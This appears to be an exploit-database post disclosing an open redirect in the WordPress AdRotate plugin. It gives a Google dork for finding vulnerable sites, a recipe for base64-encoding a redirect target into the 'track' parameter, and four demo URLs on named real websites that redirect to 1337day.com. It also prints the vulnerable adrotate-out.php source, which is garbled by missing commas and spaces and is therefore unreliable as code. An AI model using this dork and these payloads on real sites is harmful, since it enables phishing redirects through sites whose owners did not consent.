facebook facebook twitter rss

Wordpress Plugin Adrotate Open Redirection

Author: CrashBandicot , Published: 16-10-2014
######################

# Exploit Title : Wordpress Plugin Adrotate Open Redirection

# Exploit Author : CrashBandicot

# Software Website : https://www.adrotateplugin.com/

# Software Link : https://github.com/bradryan13/MLS/blob/master/wp-content/plugins/adrotate/

# Dork Google: inurl:plugins/adrotate-pro/

# Date : 2014-10-09

# Tested on : Windows XP / Mozilla Firefox

# PoC Exploit:

# The url is of redirection is crypted in base 64 ,
# Example Encrypt "7,3,0,http://exploit4arab.net" in base64 => "NywzLDAsaHR0cDovL2V4cGxvaXQ0YXJhYi5uZXQ=" Copy this Hash in method GET for have redirection in 1337day.com

# http://localhost/wp-content/plugins/adrotate/adrotate-out.php?track=[Base 64 Hash]

# Demo :

http://www.kbpyrocks.com/wp-content/plugins/adrotate-pro/adrotate-out.php?track=NywzLDAsaHR0cDovLzEzMzdkYXkuY29t
http://frenchweb.fr/wp-content/plugins/adrotate-pro/adrotate-out.php?track=NywzLDAsaHR0cDovLzEzMzdkYXkuY29t
http://www.lifecleansing.net/wp-content/plugins/adrotate-pro/adrotate-out.php?track=NywzLDAsaHR0cDovLzEzMzdkYXkuY29t
http://opticien-presse.fr/wp-content/plugins/adrotate-pro/adrotate-out.php?track=NywzLDAsaHR0cDovLzEzMzdkYXkuY29t

# Vuln File : adrotate-out.php

# Content File :

<?php

define
('WP_USE_THEMES'false);
require(
'../../../wp-blog-header.php');
global 
$wpdb$adrotate_crawlers$adrotate_debug;
if(isset(
$_GET['track']) OR $_GET['track'] != '') {
if(
$adrotate_debug['track'] == true) {
$meta $_GET['track'];
} else {
$meta base64_decode($_GET['track']);
}
if(isset(
$_GET['preview'])) $preview $_GET['preview'];
else 
$preview 0;    
list(
$ad$group$block$bannerurl) = explode(","$meta);
$today gmmktime(000gmdate("n"), gmdate("j"), gmdate("Y"));
if(
$bannerurl) {
if(
$adrotate_config['enable_stats'] == 'Y') {
$useragent trim($_SERVER['HTTP_USER_AGENT'], ' \t\r\n\0\x0B');
$prefix    $wpdb->prefix;
$remote_ip adrotate_get_remote_ip();
$now time();
if(
$adrotate_debug['timers'] == true) {
$ip 0;
} else {
$ip $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM `".$prefix."adrotate_tracker` WHERE `ipaddress` = '%s' AND `stat` = 'c' AND `timer` < $now + 86400 AND `bannerid` = %d LIMIT 1;"$remote_ip$ad));
}
if(
is_array($adrotate_crawlers)) $crawlers $adrotate_crawlers;
else 
$crawlers = array();
$nocrawler = array(0);
foreach (
$crawlers as $crawler) {
if(
preg_match("/$crawler/i"$useragent)) $nocrawler[] = 1;
}
if(
$ip AND !in_array(1$nocrawler) AND empty($preview) AND !empty($useragent)) {
$today gmmktime(000gmdate("n"), gmdate("j"), gmdate("Y"));
$wpdb->query($wpdb->prepare("UPDATE `".$prefix."adrotate_stats` SET `clicks` = `clicks` + 1 WHERE `ad` = %d AND `group` = %d AND `block` = %d AND `thetime` = $today;"$ad$group$block));
if(
$remote_ip != "unknown" AND !empty($remote_ip)) {
$wpdb->insert($prefix.'adrotate_tracker', array('ipaddress' => $remote_ip'timer' => $now'bannerid' => $ad'stat' => 'c''useragent' => $useragent));
}
}
}
wp_redirect(htmlspecialchars_decode($bannerurl), 302);
unset(
$nocrawler$crawlers$ip$remote_ip$useragent$track$meta$ad$group$block$bannerurl);
exit();
} else {
echo 
'There was an error retrieving the ad! Contact an administrator!';
}
} else {
echo 
'No or invalid Ad ID specified! Contact an administrator!';
}
?>



# print q{ Shoots to Magnom , Hashcat , m0sta };

######################

Like us on Facebook :